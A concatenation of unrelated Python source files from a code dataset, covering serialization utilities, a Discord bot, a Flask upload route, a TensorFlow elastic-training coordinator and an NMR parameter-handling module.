\"\"\"\n Hidden information encoded in serde classes.\n \"\"\"\n\n code: Dict[str, str] = field(default_factory=dict)\n\n\ndef init(debug: bool = False):\n SETTINGS['debug'] = debug\n\n\nclass SerdeError(TypeError):\n \"\"\"\n Serde error class.\n \"\"\"\n\n\ndef gen(code: str, globals: Dict = None, locals: Dict = None, cls: Type = None) -> str:\n \"\"\"\n Customized `exec` function.\n \"\"\"\n try:\n from black import format_str, FileMode\n\n code = format_str(code, mode=FileMode(line_length=100))\n except 
Exception:\n pass\n for_class = 'for ' + cls.__name__ if cls else ''\n logger.debug(f'Generating {for_class} ...\\n{code}')\n exec(code, globals, locals)\n return code\n\n\ndef typecheck(cls: Type[T], obj: T) -> None:\n \"\"\"\n type check type-annotated classes.\n\n >>> @dataclass\n ... class Foo:\n ... s: str\n >>>\n >>> typecheck(Foo, Foo('foo'))\n >>>\n >>> # Type mismatch raises `ValueError`.\n >>> try:\n ... typecheck(Foo, Foo(10))\n ... except:\n ... pass\n >>>\n \"\"\"\n if is_dataclass(obj):\n # If dataclass, type check recursively.\n for f in dataclasses.fields(obj):\n typecheck(f.type, getattr(obj, f.name, None))\n elif is_opt(cls):\n if obj is not None:\n typ = type_args(cls)[0]\n typecheck(typ, obj)\n elif is_union(cls):\n success = False\n for typ in type_args(cls):\n try:\n typecheck(typ, obj)\n success = True\n break\n except (SerdeError, ValueError):\n pass\n if not success:\n raise ValueError(f'{obj} is not instance of {cls}')\n elif is_list(cls):\n assert_type(list, obj)\n if isinstance(obj, list):\n typ = type_args(cls)[0]\n for e in obj:\n typecheck(typ, e)\n elif is_tuple(cls):\n assert_type(tuple, obj)\n if isinstance(obj, tuple):\n for i, typ in enumerate(type_args(cls)):\n typecheck(typ, obj[i])\n elif is_dict(cls):\n assert_type(dict, obj)\n if isinstance(obj, dict):\n ktyp = type_args(cls)[0]\n vtyp = type_args(cls)[1]\n for k, v in obj.items():\n typecheck(ktyp, k)\n typecheck(vtyp, v)\n else:\n if not isinstance(obj, cls):\n raise ValueError(f'{obj} is not instance of {cls}')\n\n\n@dataclass\nclass Func:\n \"\"\"\n Function wrapper that has `mangled` optional field.\n\n pyserde copies every function reference into global scope\n for code generation. Mangling function names is needed in\n order to avoid name conflict in the global scope when\n multiple fields receives `skip_if` attribute.\n \"\"\"\n\n inner: Callable[[Any], bool]\n mangeld: str = \"\"\n\n def __call__(self, v) -> bool:\n return self.inner(v) # type: ignore\n\n @property\n def name(self) -> str:\n return self.mangeld\n\n\ndef skip_if_false(v):\n return not bool(v)\n\n\n@dataclass\nclass Field:\n \"\"\"\n Field in pyserde class.\n \"\"\"\n\n type: Type\n name: Optional[str]\n default: Any = field(default_factory=dataclasses._MISSING_TYPE)\n default_factory: Any = field(default_factory=dataclasses._MISSING_TYPE)\n case: Optional[str] = None\n rename: Optional[str] = None\n skip: Optional[bool] = None\n skip_if: Optional[Func] = None\n skip_if_false: Optional[bool] = None\n\n @classmethod\n def from_dataclass(cls, f: dataclasses.Field) -> 'Field':\n skip_if_false_func: Optional[Func] = None\n if f.metadata.get('serde_skip_if_false'):\n skip_if_false_func = Func(skip_if_false, cls.mangle(f, 'skip_if'))\n\n skip_if: Optional[Func] = None\n if f.metadata.get('serde_skip_if'):\n func = f.metadata.get('serde_skip_if')\n if callable(func):\n skip_if = Func(func, cls.mangle(f, 'skip_if'))\n\n return cls(\n f.type,\n f.name,\n default=f.default,\n default_factory=f.default_factory, # type: ignore\n rename=f.metadata.get('serde_rename'),\n skip=f.metadata.get('serde_skip'),\n skip_if=skip_if or skip_if_false_func,\n )\n\n @staticmethod\n def mangle(field: dataclasses.Field, name: str) -> str:\n \"\"\"\n Get mangled name based on field name.\n \"\"\"\n return f'{field.name}_{name}'\n\n\ndef fields(FieldCls: Type, cls: Type) -> Iterator[Field]:\n return iter(FieldCls.from_dataclass(f) for f in dataclasses.fields(cls))\n\n\ndef conv(f: Field, case: Optional[str] = None) -> str:\n \"\"\"\n Convert field name.\n 
\"\"\"\n name = f.name\n if case:\n casef = getattr(stringcase, case or '', None)\n if not casef:\n raise SerdeError(\n (f\"Unkown case type: {f.case}.\" f\"Pass the name of case supported by 'stringcase' package.\")\n )\n name = casef(f.name)\n if f.rename:\n name = f.rename\n if name is None:\n raise SerdeError('Field name is None.')\n return name\n","sub_path":"serde/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199341673","text":"import numpy as np\nfrom veca.gym.core.environment import EnvModule\n\nIMG_H, IMG_W = 84, 84\n\ndef wav2freq(wav):\n wav0, wav1 = wav[0], wav[1]\n wav0 = abs(np.fft.rfft(wav0))[:250]\n wav0 = np.log10(wav0 + 1e-8)\n wav1 = abs(np.fft.rfft(wav1))[:250]\n wav1 = np.log10(wav1 + 1e-8)\n wav = np.array([wav0, wav1])\n #print(np.max(wav0), np.max(wav1))\n return wav\n\nclass Environment(EnvModule):\n def __init__(self, num_envs, ip,port,args):\n EnvModule.__init__(self, num_envs, ip,port,args)\n self.num_envs = num_envs\n \n def step(self, action):\n data = super().step(action)\n rewards, done, info = [], [], []\n imgs, wavs = [], []\n for i in range(self.num_envs):\n img = list(reversed(data['img'][i]))\n wav = data['wav'][i]\n doneA = data['done'][i][0]\n reward = data['reward'][i][0]\n pos = data['pos'][i]\n img = np.reshape(np.array(img), [6, IMG_H, IMG_W]) / 255.0\n wav = np.reshape(np.array(wav), [2, -1]) / 32768.0 \n wav = wav2freq(wav)\n imgs.append(img)\n wavs.append(wav)\n rewards.append(reward)\n if doneA: done.append(True)\n else: done.append(False)\n info.append(pos)\n imgs, wavs = np.array(imgs), np.array(wavs)\n obs = (imgs, wavs)\n return (obs, rewards, done, info)\n\n\n","sub_path":"veca/gym/kicktheball/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"502741117","text":"import requests\nimport json\nfrom fastjsonschema import *\nfrom Workflow_Django.settings import CONSTANT_URL\nfrom workflow_vault.exceptions import WorkflowException\ndef initiateWorkflow(body):\n # print(type(body))\n correct = False\n for k in body.keys():\n v = body.get(k)\n if v and v.strip():\n correct = True\n else:\n data = v\n correct = False\n break\n if(correct):\n containerID = body['container-id']\n processID = body['process-id']\n URL = CONSTANT_URL+'containers/'+containerID+'/processes/'+processID+'/instances'\n header = {'Content-type':'application/json'}\n response = requests.post(URL, headers = header, json = body).json()\n return response\n else:\n raise WorkflowException(404, \"Validation error\", \" Mandatory field is missing\")","sub_path":"workflow_vault/workflowInitiation/workflowInitiate/initiateWorkflow.py","file_name":"initiateWorkflow.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"184226584","text":"command = input()\r\nheros = {}\r\n\r\nwhile command != 'End':\r\n if command.split(' ')[0] == 'Enroll':\r\n hero_name = command.split(' ')[1]\r\n if hero_name not in heros:\r\n heros[hero_name] = []\r\n else:\r\n print(f'{hero_name} is already enrolled.')\r\n if command.split(' ')[0] == 'Learn':\r\n hero_name = command.split(' ')[1]\r\n spell = command.split(' ')[2]\r\n if hero_name not in heros:\r\n print(f'{hero_name} doesn\\'t exist.')\r\n else:\r\n if spell in heros[hero_name]:\r\n 
print(f'{hero_name} has already learnt {spell}.')\r\n else:\r\n heros[hero_name].append(spell)\r\n if command.split(' ')[0] =='Unlearn':\r\n hero_name = command.split(' ')[1]\r\n spell = command.split(' ')[2]\r\n if hero_name not in heros:\r\n print(f'{hero_name} doesn\\'t exist.')\r\n else:\r\n if spell not in heros[hero_name]:\r\n print(f'{hero_name} doesn\\'t know {spell}.')\r\n else:\r\n heros[hero_name].remove(spell)\r\n command = input()\r\n\r\nordered_heros = sorted(heros.items(), key=lambda s: (-len(s[1]), s[0]))\r\n\r\nprint('Heroes:')\r\n\r\nfor name, spells in ordered_heros:\r\n print(f'== {name}:', end=' ' )\r\n print(', '.join(spells))","sub_path":"PyCharm_projects_2020/Fundamentals/Exam_prep/hero_recruitment.py","file_name":"hero_recruitment.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"598364345","text":"\nimport csv\nimport os\n\nfrom pyclan import filters\nfrom pyclan import elements\n\nclass ClanFile(object):\n\n get_user_comments = filters.user_comments\n get_conv_block = filters.conv_block\n get_conv_blocks = filters.conv_blocks\n # get_paus_block = filters.paus_block\n # get_paus_blocks = filters.paus_blocks\n get_tiers = filters.tier\n get_within_time = filters.time\n get_with_keyword = filters.get_with_keyword\n replace_with_keyword = filters.replace_with_keyword\n\n end_tag = \"@End\"\n\n def __init__(self, path):\n self.clan_path = path\n self.filename = os.path.basename(self.clan_path)\n self.num_full_blocks = 0\n self.full_block_range = False\n self.block_index = [] # list of all the full block indices in this file\n self.line_map = self.parse_file()\n\n def parse_file(self):\n line_map = []\n with open(self.clan_path, \"rU\") as input:\n current_conv_block = 0\n current_paus_block = 0\n \n conv_block_started = False\n conv_block_ended = False\n\n last_conv_block_type = \"\"\n last_conv_block_num = 0\n # no_conv_block_start = False\n # no_conv_block_end = False\n\n paus_block_started = False\n paus_block_ended = False\n\n last_line = None\n for index, line in enumerate(input):\n clan_line = elements.ClanLine(index, line)\n #print line\n\n if line.startswith(\"@\") or index < 11:\n block_delimiter = False\n if line.startswith(\"@Bg\") or line.startswith(\"@Eg\"):\n conv_block_regx_result = elements.block_regx.search(line)\n paus_block_regx_result = elements.pause_regx.search(line)\n if conv_block_regx_result:\n current_conv_block = int(conv_block_regx_result.group(1))\n block_delimiter = True\n if \"@Bg\" in line:\n last_conv_block_type = \"@Bg\"\n last_conv_block_num = current_conv_block\n conv_block_started = True\n conv_block_ended = False\n if \"@Eg\" in line:\n if last_conv_block_type == \"@Bg\" and last_conv_block_num == current_conv_block:\n self.num_full_blocks += 1\n self.block_index.append(current_conv_block)\n last_conv_block_type = \"@Eg\"\n last_conv_block_num = current_conv_block\n conv_block_started = False\n conv_block_ended = True\n clan_line.is_conv_block_delimiter = True\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n line_map.append(clan_line)\n last_line = clan_line\n continue\n clan_line.is_conv_block_delimiter = block_delimiter\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n line_map.append(clan_line)\n last_line = clan_line\n continue\n\n clan_line.is_header = True\n if \"@End\" in line:\n 
clan_line.is_end_header = True\n clan_line.time_onset = None\n clan_line.time_offset = None\n line_map.append(clan_line)\n last_line = clan_line\n continue\n\n if line.startswith(\"\\t\"):\n if last_line.is_user_comment or last_line.is_tier_line:\n last_line.is_multi_parent = True\n clan_line.multi_line_parent = last_line\n if last_line.is_tier_line:\n clan_line.is_tier_line = True\n clan_line.tier = clan_line.multi_line_parent.tier\n else:\n clan_line.multi_line_parent = last_line.multi_line_parent\n if clan_line.multi_line_parent.is_tier_line:\n clan_line.is_tier_line = True\n clan_line.tier = clan_line.multi_line_parent.tier\n\n if line.startswith(\"%com:\") or line.startswith(\"%xcom:\"):\n if line.count(\"|\") > 3:\n clan_line.clan_comment = True\n else:\n clan_line.is_user_comment = True\n clan_line.content = line.split(\"\\t\")[1]\n\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n\n if line.startswith(\"%xdb:\"):\n clan_line.xdb_line = True\n xdb_regx_result = elements.xdb_regx.search(line)\n if xdb_regx_result:\n clan_line.xdb_average = xdb_regx_result.group(1)\n clan_line.xdb_peak = xdb_regx_result.group(2)\n\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n\n interv_regx_result = elements.interval_regx.search(line)\n\n if interv_regx_result:\n timestamp = interv_regx_result.group()\n onset = int(timestamp.split(\"_\")[0].replace(\"\\x15\", \"\"))\n offset = int(timestamp.split(\"_\")[1].replace(\"\\x15\", \"\"))\n clan_line.time_onset = onset\n clan_line.time_offset = offset\n clan_line.total_time = offset - onset\n\n # there's no timestamp on a tier line\n # (it wraps around to the next line)\n if last_line.is_tier_without_timestamp:\n last_line.time_onset = onset\n last_line.time_offset = offset\n last_line.total_time = offset - onset\n\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n if line.startswith(\"*\"):\n clan_line.tier = line[1:4]\n clan_line.content = line.split(\"\\t\")[1].replace(timestamp+\"\\n\", \"\")\n clan_line.is_tier_line = True\n\n else:\n if line.startswith(\"*\"):\n clan_line.tier = line[1:4]\n clan_line.content = line.split(\"\\t\")[1].replace(\"\\n\", \"\")\n clan_line.is_tier_line = True\n clan_line.is_tier_without_timestamp = True\n\n line_map.append(clan_line)\n last_line = clan_line\n\n # self.num_blocks = current_conv_block\n return line_map\n\n def block_map(self):\n return True\n\n def get_header(self):\n return [line for line in self.line_map\n if line.is_header]\n\n def write_entries_to_csv(self, path):\n with open(path, \"wb\") as output:\n writer = csv.writer(output)\n writer.writerow([\"file\", \"line\", \"timestamp\"])\n\n\n def write_to_cha(self, path):\n with open(path, \"wb\") as output:\n for line in self.line_map:\n output.write(line.line)\n\n def new_file_from_blocks(self, path, blocks=[], rewrite_timestamps=False,\n begin=1, end=None):\n \"\"\"\n This produces a new cha file with only the blocks specified\n\n Args:\n path: path to the new output cha file\n blocks: list of indices of blocks\n rewrite_timestamps: if True, then timestamps will be rewritten to\n start from 0 and be contiguous with each other\n\n \"\"\"\n blocks = sorted(blocks) #make sure they're in ascending order\n\n with open(path, \"wb\") as output:\n header = 
self.get_header()\n if blocks:\n blocks = self.get_conv_blocks(select=blocks)\n else:\n blocks = self.get_conv_blocks(begin=begin, end=end)\n\n for line in header:\n if not line.is_end_header:\n output.write(line.line)\n\n for line in blocks.line_map:\n output.write(line.line)\n\n output.write(self.end_tag)\n\n","sub_path":"pyclan/clanfile.py","file_name":"clanfile.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"515737970","text":"import discord\nfrom discord.ext.commands import Bot\nimport discord.utils\n\n\n\nBOT_PREFIX = ('!bren')\nbot = Bot(command_prefix=BOT_PREFIX)\ntallydict = {}\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('---------')\n\n@bot.command(name='addTally',\n description=\"Adds a tally\",\n brief=\"get roasted\",\n aliases=['tally', 'addtally', 'Addtally'],\n pass_context=True)\nasync def addTally(ctx, desUser: str, num: int):\n if desUser in tallydict:\n tallydict[desUser] += num\n msg = desUser + ' now has ' + str(tallydict[desUser]) + ' tallies.'\n await ctx.send(msg)\n else:\n tallydict[desUser] = num\n await ctx.send(desUser + ' has received their first tally. They now have ' + str(tallydict[desUser]) + ' tallies.')\n\n\n\n\n\n\n\n","sub_path":"src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"68309813","text":"import os\nimport uuid\nfrom app import db\nfrom app.api import bp\nfrom app import uploadFolder\nfrom datetime import datetime\nfrom app.tasks import train_task\nfrom flask import jsonify, request, make_response, url_for\nfrom app.utils import make_message\nfrom app.utils import check_properties\nfrom app.models import Algorithm, DataFile, DataSet, DataResult\nfrom inspect import getmembers, isfunction\n\n\nexpectedContentType = \"multipart/form-data\"\n\n@bp.route('train/file', methods = ['POST'])\ndef train_file():\n ok, msg = check_properties(request, form = None, files = None, content_type = expectedContentType)\n if not ok:\n return jsonify(make_message(True, message = msg))\n \n form = request.form.to_dict()\n files = request.files.to_dict()\n\n originalTrainFileName = files.get('trainFile').filename\n originalTestFileName = files.get('testFile').filename\n\n trainFileExt = os.path.splitext(originalTrainFileName)[1]\n testFileExt = os.path.splitext(originalTestFileName)[1]\n trainMimeType = files.get('trainFile').mimetype\n testMimeType = files.get('testFile').mimetype\n trainFileName = uuid.uuid1().hex + trainFileExt\n testFileName = uuid.uuid1().hex + testFileExt\n \n try:\n files.get('trainFile').save(os.path.join(uploadFolder, trainFileName))\n files.get('testFile').save(os.path.join(uploadFolder, testFileName))\n except IOError as ioe:\n saveFileErrorMessage = 'I/O error during write of files: {}'.format(repr(ioe))\n print(saveFileErrorMessage)\n return jsonify(make_message(True, message = saveFileErrorMessage))\n except Exception as e:\n exceptionErrorMessage = 'Exception during file processing: {}'.format(repr(e))\n print(exceptionErrorMessage)\n return jsonify(make_message(True, message = exceptionErrorMessage))\n\n trainStats = os.stat(os.path.join(uploadFolder, trainFileName))\n testStats = os.stat(os.path.join(uploadFolder, testFileName))\n\n trainFileCreated = datetime.utcfromtimestamp(trainStats.st_ctime)\n testFileCreated = 
datetime.utcfromtimestamp(testStats.st_ctime)\n\n trainFileSize = trainStats.st_size\n testFileSize = testStats.st_size\n\n try:\n algorithm = db.session.query(Algorithm).filter_by(name = form['algorithmName']).one()\n except Exception as e:\n exceptionErrorMessage = 'Exception during algorithm search: {}. On searching for: {}'.format(repr(e), form['algorithmName'])\n print(exceptionErrorMessage)\n return jsonify(make_message(True, message = exceptionErrorMessage))\n \n trainFile = DataFile(\n originalfilename = originalTrainFileName,\n actualfilename = trainFileName,\n actualfilepath = uploadFolder,\n mimetype = trainMimeType,\n filesize = trainFileSize,\n created = datetime.utcnow(),\n fileprototype = \"train\")\n\n testFile = DataFile(\n originalfilename = originalTestFileName,\n actualfilename = testFileName,\n actualfilepath = uploadFolder,\n mimetype = testMimeType,\n filesize = testFileSize,\n created = datetime.utcnow(),\n fileprototype = \"test\")\n\n dataset = DataSet(\n name = form.get('dataName'),\n date = datetime.utcnow(),\n datatype = 'training',\n algorithm_id = algorithm.id)\n\n dataset.files = [trainFile, testFile]\n \n db.session.add(dataset)\n db.session.commit()\n\n task = train_task.apply_async(\n args = [\n os.path.join(uploadFolder, trainFileName),\n os.path.join(uploadFolder, testFileName),\n dataset.id, algorithm.script_name\n ]\n )\n message = make_message(False, taskstatusurl = url_for('api.task_status', task_name='train_task', task_id = task.id))\n\n return make_response(jsonify(message), 202)\n\n","sub_path":"iaproject/back/app/api/routes/trainfile.py","file_name":"trainfile.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"29764534","text":"import os\nimport subprocess\nimport time\nimport tensorflow as tf\n\nfrom utils.resolver import get_coordinator_resolver\nfrom utils.model import MyModel, get_datasets\nfrom tensorflow.python.eager import context\n\nfrom tensorflow.python.distribute.coordinator.cluster_coordinator import Worker\n\nif __name__ == \"__main__\":\n cluster_resolver = get_coordinator_resolver(num_workers=3)\n\n variable_partitioner = (\n tf.distribute.experimental.partitioners.FixedShardsPartitioner(\n num_shards=1))\n\n strategy = tf.distribute.experimental.ParameterServerStrategy(\n cluster_resolver,\n variable_partitioner=variable_partitioner)\n\n with strategy.scope():\n # Create an instance of the model\n model = MyModel()\n\n loss_object = tf.keras.losses.SparseCategoricalCrossentropy(\n reduction=tf.keras.losses.Reduction.NONE,\n from_logits=True)\n\n optimizer = tf.keras.optimizers.Adam()\n\n train_loss = tf.keras.metrics.Mean(name='train_loss')\n train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\n test_loss = tf.keras.metrics.Mean(name='test_loss')\n test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='test_accuracy')\n\n def get_step_fn(comment=\"\"):\n @tf.function\n def step_fn(iterator):\n def train_step(images, labels):\n with tf.GradientTape() as tape:\n # training=True is only needed if there are layers with different\n # behavior during training versus inference (e.g. 
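# A minimal sketch of the upload-naming scheme used in train_file() above:
# keep the client's file extension but store the file under a uuid1 hex name
# so concurrent uploads cannot collide. (The file name is illustrative only.)
import os, uuid
demo_original = "measurements.csv"
demo_stored = uuid.uuid1().hex + os.path.splitext(demo_original)[1]
# e.g. "5f2b6c1e9f4211ee8a3b0242ac120002.csv"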
Dropout).\n predictions = model(images, training=True)\n loss = loss_object(labels, predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n\n train_loss(loss)\n train_accuracy(labels, predictions)\n tf.print(\"loss-{}:\".format(comment), tf.math.reduce_mean(loss))\n return loss\n\n images, labels = next(iterator)\n losses = strategy.run(train_step, args=(images, labels))\n return strategy.reduce(tf.distribute.ReduceOp.SUM, losses, axis=None)\n return step_fn\n\n # Dispatch to Remote\n coordinator = tf.distribute.experimental.coordinator.ClusterCoordinator(strategy)\n\n # Must create dataset in this function.\n # Could not use a global function.\n def dataset_fn(_):\n train_ds, test_ds = get_datasets()\n return train_ds\n\n @tf.function\n def per_worker_dataset_fn():\n return strategy.distribute_datasets_from_function(dataset_fn)\n\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n\n EPOCHS = 5\n for epoch in range(EPOCHS):\n # Reset the metrics at the start of the next epoch\n train_loss.reset_states()\n train_accuracy.reset_states()\n test_loss.reset_states()\n test_accuracy.reset_states()\n coordinator.join()\n\n step = 50\n if epoch == 1:\n # add worker 3\n tf.config.experimental_connect_to_cluster(\n get_coordinator_resolver(num_workers=4),\n job_name=\"chief\")\n coordinator._cluster.workers.append(\n Worker(3, \"/job:worker/replica:0/task:3\", coordinator._cluster)\n )\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n\n if epoch == 2:\n # add worker 4\n tf.config.experimental_connect_to_cluster(\n get_coordinator_resolver(num_workers=5),\n job_name=\"chief\")\n coordinator._cluster.workers.append(\n Worker(4, \"/job:worker/replica:0/task:4\", coordinator._cluster)\n )\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n\n if epoch == 3:\n # stop worker 0\n coordinator._cluster.workers[0].stop()\n # manually kill worker 0 with hardcoding\n pids = os.popen(\"ps -a | grep 'port 2101' | awk '{print $1}'\").read().split(\"\\n\")\n os.system(\"kill {}\".format(\" \".join(pids)))\n\n \n if epoch == 4:\n # restart worker 0\n proc = subprocess.Popen('python3 ./worker.py --role=worker --idx=0 --port 2101 >> ./worker_0.log 2>&1',\n shell=True)\n # wait for the new server to start\n time.sleep(5)\n tf.config.experimental_connect_to_cluster(\n get_coordinator_resolver(num_workers=5),\n job_name=\"chief\")\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n coordinator._cluster.workers[0].restart()\n\n step_fn = get_step_fn(epoch + 1)\n for i in range(step):\n coordinator.schedule(step_fn,\n args=(per_worker_train_iter,))\n coordinator.join()\n train_loss_result = train_loss.result()\n train_accuracy_result = train_accuracy.result()\n coordinator.join()\n print(\n f'Epoch {epoch + 1}, '\n f'Loss: {train_loss_result}, '\n f'Accuracy: {train_accuracy_result * 100}, ',\n flush=True\n )\n proc.terminate()","sub_path":"mnist-worker-elastic/coordinator.py","file_name":"coordinator.py","file_ext":"py","file_size_in_byte":5632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"420311501","text":"\"\"\"The parameters 
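# Hedged, self-contained sketch of the GradientTape update inside step_fn
# above, on a toy scalar model (no cluster required): compute the loss under
# the tape, then apply the gradients through the optimizer.
import tensorflow as tf
demo_w = tf.Variable(2.0)
demo_opt = tf.keras.optimizers.Adam()
with tf.GradientTape() as demo_tape:
    demo_loss = (demo_w - 1.0) ** 2
demo_grads = demo_tape.gradient(demo_loss, [demo_w])
demo_opt.apply_gradients(zip(demo_grads, [demo_w]))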
module contains the code for handling of the experimental and\nfitting parameters.\"\"\"\nimport ast\nimport configparser\nimport copy\nimport pathlib\nimport re\nfrom difflib import get_close_matches\n\nimport lmfit\nimport numpy as np\nfrom asteval import astutils\n\nfrom chemex import peaks\nfrom chemex import util\n\nNAME_MARKERS = {\n \"name\": \"__n_{}_n__\",\n \"nuclei\": \"__r_{}_r__\",\n \"temperature\": \"__t_{}_t__\",\n \"h_larmor_frq\": \"__b_{}_b__\",\n \"p_total\": \"__p_{}_p__\",\n \"l_total\": \"__l_{}_l__\",\n}\n\nFRIENDLY_MARKERS = {\n \"name\": \"{}\",\n \"nuclei\": \"NUC->{}\",\n \"temperature\": \"T->{:.1f}C\",\n \"h_larmor_frq\": \"B0->{:.1f}MHz\",\n \"p_total\": \"[P]->{:e}M\",\n \"l_total\": \"[L]->{:e}M\",\n}\n\nRE_QUALIFIERS = re.compile(\n \"\"\"\n (^\\s*(?P\\w+)) |\n (NUC\\s*->\\s*(?P(\\w|-)+)) |\n (T\\s*->s*(?P{0})) |\n (B0\\s*->\\s*(?P{0})) |\n (\\[P\\]\\s*->\\s*(?P{0})) |\n (\\[L\\]\\s*->\\s*(?P{0})) |\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\n# Regular expression to pick values of the form: intial value [min, max]\nRE_VALUE_MIN_MAX = re.compile(\n \"\"\"\n ^\\s*\n (?P{0})?\\s*\n (\\[\\s*(?P({0}|{1}))\\s*,\\s*(?P({0}|{1}))\\s*\\]\\s*)?\n .*$\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\", \"[-+]?inf\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\n# Regular expression to pick values of the form:\n# intial value [min, max, brute_stepsize]\nRE_VALUE_MIN_MAX_BRUTE = re.compile(\n \"\"\"\n ^\\s*\n (?P{0})?\\s*\n (\\[\\s*(?P({0}|{1}))\\s*,\n \\s*(?P({0}|{1}))\\s*,\n \\s*(?P({0}|None))\\s*\n \\]\\s*)?\n .*$\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\", \"[-+]?inf\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\nRE_PARNAME = re.compile(\n \"\"\"\n (__n_(?P\\w+)_n__)?\n (__r_(?P(\\w|-)+)_r__)?\n (__t_(?P{0})_t__)?\n (__b_(?P{0})_b__)?\n (__p_(?P{0})_p__)?\n (__l_(?P{0})_l__)?\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\n\nclass MakeTranslate:\n \"\"\"MakeTranslate class for translating parameter names.\n\n From: www.oreilly.com/library/view/python-cookbook-2nd/0596007973/ch01s19.html\n \"\"\"\n\n def __init__(self, *args, **kwds):\n self.dictionary = dict(*args, **kwds)\n self.re_expr = self.make_re_expr()\n\n def make_re_expr(self):\n \"\"\"TODO: method docstring.\"\"\"\n return re.compile(\"|\".join(map(re.escape, self.dictionary)), re.IGNORECASE)\n\n def one_xlat(self, match):\n \"\"\"TODO: method docstring.\"\"\"\n return self.dictionary[match.group(0)]\n\n def __call__(self, text):\n return self.re_expr.sub(self.one_xlat, text)\n\n\nEXPAND = MakeTranslate({\"-\": \"__minus__\", \"+\": \"__plus__\", \".\": \"__point__\"})\nCOMPRESS = MakeTranslate({\"__minus__\": \"-\", \"__plus__\": \"+\", \"__point__\": \".\"})\n\n\nclass ParamName:\n \"\"\"ParameterName class.\"\"\"\n\n def __init__(\n self,\n name=None,\n nuclei=None,\n temperature=None,\n h_larmor_frq=None,\n p_total=None,\n l_total=None,\n ):\n self.name = self.nuclei = self.temperature = self.h_larmor_frq = None\n self.p_total = self.l_total = None\n\n if name is not None:\n self.name = name.lower()\n\n if nuclei is not None:\n self.nuclei = peaks.Peak(nuclei).assignment\n\n if temperature is not None:\n self.temperature = round(float(temperature), 1)\n\n if h_larmor_frq is not None:\n self.h_larmor_frq = round(float(h_larmor_frq), 1)\n\n if p_total is not None:\n self.p_total = float(p_total)\n\n if l_total is not None:\n self.l_total = float(l_total)\n\n @classmethod\n def 
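# Usage sketch for the MakeTranslate helper defined above: all dictionary keys
# are compiled into one escaped alternation, so every replacement happens in a
# single left-to-right regex pass.
demo_expand = MakeTranslate({"-": "__minus__", "+": "__plus__", ".": "__point__"})
demo_expand("GLY23N-H.2")  # -> "GLY23N__minus__H__point__2"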
from_fname(cls, full_name=None):\n \"\"\"TODO: method docstring.\"\"\"\n if full_name is None:\n full_name = \"\"\n\n full_name = COMPRESS(full_name)\n\n match = re.match(RE_PARNAME, full_name)\n qualifiers = {}\n if match is not None:\n qualifiers.update(match.groupdict())\n\n return cls(**qualifiers)\n\n @classmethod\n def from_section(cls, section=None):\n \"\"\"TODO: method docstring.\"\"\"\n if section is None:\n section = \"\"\n qualifiers = re_to_dict(RE_QUALIFIERS, section)\n\n return cls(**qualifiers)\n\n def update_nuclei(self, nuclei=None):\n \"\"\"TODO: method docstring.\"\"\"\n if nuclei is not None:\n self.nuclei = peaks.Peak(nuclei).assignment\n\n return self\n\n def to_full_name(self):\n \"\"\"TODO: method docstring.\"\"\"\n name_components = []\n\n for attribute, value in vars(self).items():\n if value is not None:\n name_components.append(NAME_MARKERS[attribute].format(value))\n\n full_name = EXPAND(\"\".join(name_components))\n\n return full_name\n\n def to_section_name(self, nuclei=False):\n \"\"\"TODO: method docstring.\"\"\"\n\n name_components = []\n\n for attribute, value in vars(self).items():\n if (attribute != \"nuclei\" or nuclei) and value is not None:\n 